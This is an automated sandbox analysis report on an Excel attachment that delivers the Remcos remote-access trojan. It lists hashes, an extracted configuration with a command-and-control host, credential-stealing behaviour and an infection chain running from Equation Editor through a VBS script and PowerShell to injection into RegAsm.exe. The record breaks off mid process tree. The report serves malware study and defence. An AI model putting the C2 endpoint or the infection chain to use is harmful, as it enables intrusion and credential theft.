remcos | 3ac1e9bc1c29e4f900a34d8e98672106887155015c3d868eb35b18a546f64af9

Resubmissions

26-03-2024 15:41

240326-s4zq5sdc96 10

26-03-2024 09:20

240326-la8zdshh8x 10

Analysis

max time kernel
149s
max time network
131s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
26-03-2024 15:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Order request list.xls
Size

317KB
MD5

e8c8fee58f84cd706cd5955773887500
SHA1

f80268a58e1f1635dd9ccd6dd029dae2bf93fd58
SHA256

3ac1e9bc1c29e4f900a34d8e98672106887155015c3d868eb35b18a546f64af9
SHA512

c9a2e5b267d21ce88e8ac240590048702e1054f23fdaabbef234c58ceada0b9dcb177ad5ebb219ebffde3cf6e7679fa7dbf031881024b529e0155e0e9836f57e
SSDEEP

6144:Q0unhXF7uY35qAOJl/YrLYz+WrNhZF+E+fgL+0dD8ivSbVsHMI2brcbJTvhl8ult:Q9hXdn3bVsHMI2cJjZlTiAp

Score

10^/10

remcos remotehost collection rat spyware stealer

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

lasteast.duckdns.org:2401

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-T50E1H
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

NirSoft MailPassView 3 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral1/memory/2764-328-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView
behavioral1/memory/2764-330-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView
behavioral1/memory/2764-347-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 3 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral1/memory/2780-322-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/2780-321-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/2780-338-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 9 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2780-322-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/2780-321-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/2764-328-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/2764-330-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/2368-331-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/2368-332-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/2368-333-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/2780-338-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/2764-347-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

Blocklisted process makes network request 7 IoCs

Processes:

EQNEDT32.EXEWScript.exepowershell.exe

flow pid process

19 2232 EQNEDT32.EXE
22 1680 WScript.exe
24 1680 WScript.exe
26 2808 powershell.exe
28 2808 powershell.exe
30 2808 powershell.exe
33 2808 powershell.exe
Abuses OpenXML format to download file from external location
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

flow	pid	process
19	2232	EQNEDT32.EXE
22	1680	WScript.exe
24	1680	WScript.exe
26	2808	powershell.exe
28	2808	powershell.exe
30	2808	powershell.exe
33	2808	powershell.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	RegAsm.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exeRegAsm.exe

description	pid	process	target process
PID 2808 set thread context of 112	2808	powershell.exe	RegAsm.exe
PID 112 set thread context of 2780	112	RegAsm.exe	RegAsm.exe
PID 112 set thread context of 2764	112	RegAsm.exe	RegAsm.exe
PID 112 set thread context of 2368	112	RegAsm.exe	RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
exploit

Exploitation for Client Execution
T1203

Processes:

EQNEDT32.EXE

pid process

2232 EQNEDT32.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

pid	process
2232	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXEEXCEL.EXE

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

2892 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exeRegAsm.exe

pid process

2320 powershell.exe
2808 powershell.exe
2780 RegAsm.exe
2780 RegAsm.exe
Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

RegAsm.exe

pid process

112 RegAsm.exe
112 RegAsm.exe
112 RegAsm.exe
112 RegAsm.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exeRegAsm.exe

description pid process

Token: SeDebugPrivilege 2320 powershell.exe
Token: SeDebugPrivilege 2808 powershell.exe
Token: SeDebugPrivilege 2368 RegAsm.exe
Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

EXCEL.EXEWINWORD.EXE

pid process

2892 EXCEL.EXE
2892 EXCEL.EXE
2892 EXCEL.EXE
624 WINWORD.EXE
624 WINWORD.EXE

pid	process
2892	EXCEL.EXE

pid	process
2320	powershell.exe
2808	powershell.exe
2780	RegAsm.exe
2780	RegAsm.exe

pid	process
112	RegAsm.exe
112	RegAsm.exe
112	RegAsm.exe
112	RegAsm.exe

description	pid	process
Token: SeDebugPrivilege	2320	powershell.exe
Token: SeDebugPrivilege	2808	powershell.exe
Token: SeDebugPrivilege	2368	RegAsm.exe

pid	process
2892	EXCEL.EXE
2892	EXCEL.EXE
2892	EXCEL.EXE
624	WINWORD.EXE
624	WINWORD.EXE

Suspicious use of WriteProcessMemory 63 IoCs

Processes:

EQNEDT32.EXEWINWORD.EXEWScript.exepowershell.exepowershell.exeRegAsm.exe

description	pid	process	target process
PID 2232 wrote to memory of 1680	2232	EQNEDT32.EXE	WScript.exe
PID 2232 wrote to memory of 1680	2232	EQNEDT32.EXE	WScript.exe
PID 2232 wrote to memory of 1680	2232	EQNEDT32.EXE	WScript.exe
PID 2232 wrote to memory of 1680	2232	EQNEDT32.EXE	WScript.exe
PID 624 wrote to memory of 1300	624	WINWORD.EXE	splwow64.exe
PID 624 wrote to memory of 1300	624	WINWORD.EXE	splwow64.exe
PID 624 wrote to memory of 1300	624	WINWORD.EXE	splwow64.exe
PID 624 wrote to memory of 1300	624	WINWORD.EXE	splwow64.exe
PID 1680 wrote to memory of 2320	1680	WScript.exe	powershell.exe
PID 1680 wrote to memory of 2320	1680	WScript.exe	powershell.exe
PID 1680 wrote to memory of 2320	1680	WScript.exe	powershell.exe
PID 1680 wrote to memory of 2320	1680	WScript.exe	powershell.exe
PID 2320 wrote to memory of 2808	2320	powershell.exe	powershell.exe
PID 2320 wrote to memory of 2808	2320	powershell.exe	powershell.exe
PID 2320 wrote to memory of 2808	2320	powershell.exe	powershell.exe
PID 2320 wrote to memory of 2808	2320	powershell.exe	powershell.exe
PID 2808 wrote to memory of 112	2808	powershell.exe	RegAsm.exe
PID 2808 wrote to memory of 112	2808	powershell.exe	RegAsm.exe
PID 2808 wrote to memory of 112	2808	powershell.exe	RegAsm.exe
PID 2808 wrote to memory of 112	2808	powershell.exe	RegAsm.exe
PID 2808 wrote to memory of 112	2808	powershell.exe	RegAsm.exe
PID 2808 wrote to memory of 112	2808	powershell.exe	RegAsm.exe
PID 2808 wrote to memory of 112	2808	powershell.exe	RegAsm.exe
PID 2808 wrote to memory of 112	2808	powershell.exe	RegAsm.exe
PID 2808 wrote to memory of 112	2808	powershell.exe	RegAsm.exe
PID 2808 wrote to memory of 112	2808	powershell.exe	RegAsm.exe
PID 2808 wrote to memory of 112	2808	powershell.exe	RegAsm.exe
PID 2808 wrote to memory of 112	2808	powershell.exe	RegAsm.exe
PID 2808 wrote to memory of 112	2808	powershell.exe	RegAsm.exe
PID 2808 wrote to memory of 112	2808	powershell.exe	RegAsm.exe
PID 2808 wrote to memory of 112	2808	powershell.exe	RegAsm.exe
PID 2808 wrote to memory of 112	2808	powershell.exe	RegAsm.exe
PID 112 wrote to memory of 2780	112	RegAsm.exe	RegAsm.exe
PID 112 wrote to memory of 2780	112	RegAsm.exe	RegAsm.exe
PID 112 wrote to memory of 2780	112	RegAsm.exe	RegAsm.exe
PID 112 wrote to memory of 2780	112	RegAsm.exe	RegAsm.exe
PID 112 wrote to memory of 2780	112	RegAsm.exe	RegAsm.exe
PID 112 wrote to memory of 2780	112	RegAsm.exe	RegAsm.exe
PID 112 wrote to memory of 2780	112	RegAsm.exe	RegAsm.exe
PID 112 wrote to memory of 2780	112	RegAsm.exe	RegAsm.exe
PID 112 wrote to memory of 2648	112	RegAsm.exe	RegAsm.exe
PID 112 wrote to memory of 2648	112	RegAsm.exe	RegAsm.exe
PID 112 wrote to memory of 2648	112	RegAsm.exe	RegAsm.exe
PID 112 wrote to memory of 2648	112	RegAsm.exe	RegAsm.exe
PID 112 wrote to memory of 2648	112	RegAsm.exe	RegAsm.exe
PID 112 wrote to memory of 2648	112	RegAsm.exe	RegAsm.exe
PID 112 wrote to memory of 2648	112	RegAsm.exe	RegAsm.exe
PID 112 wrote to memory of 2764	112	RegAsm.exe	RegAsm.exe
PID 112 wrote to memory of 2764	112	RegAsm.exe	RegAsm.exe
PID 112 wrote to memory of 2764	112	RegAsm.exe	RegAsm.exe
PID 112 wrote to memory of 2764	112	RegAsm.exe	RegAsm.exe
PID 112 wrote to memory of 2764	112	RegAsm.exe	RegAsm.exe
PID 112 wrote to memory of 2764	112	RegAsm.exe	RegAsm.exe
PID 112 wrote to memory of 2764	112	RegAsm.exe	RegAsm.exe
PID 112 wrote to memory of 2764	112	RegAsm.exe	RegAsm.exe
PID 112 wrote to memory of 2368	112	RegAsm.exe	RegAsm.exe
PID 112 wrote to memory of 2368	112	RegAsm.exe	RegAsm.exe
PID 112 wrote to memory of 2368	112	RegAsm.exe	RegAsm.exe
PID 112 wrote to memory of 2368	112	RegAsm.exe	RegAsm.exe
PID 112 wrote to memory of 2368	112	RegAsm.exe	RegAsm.exe
PID 112 wrote to memory of 2368	112	RegAsm.exe	RegAsm.exe
PID 112 wrote to memory of 2368	112	RegAsm.exe	RegAsm.exe
PID 112 wrote to memory of 2368	112	RegAsm.exe	RegAsm.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Order request list.xls"
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2892

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:624

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:1300

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2232

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\createdkissingsomeone.vbs"
2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1680

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
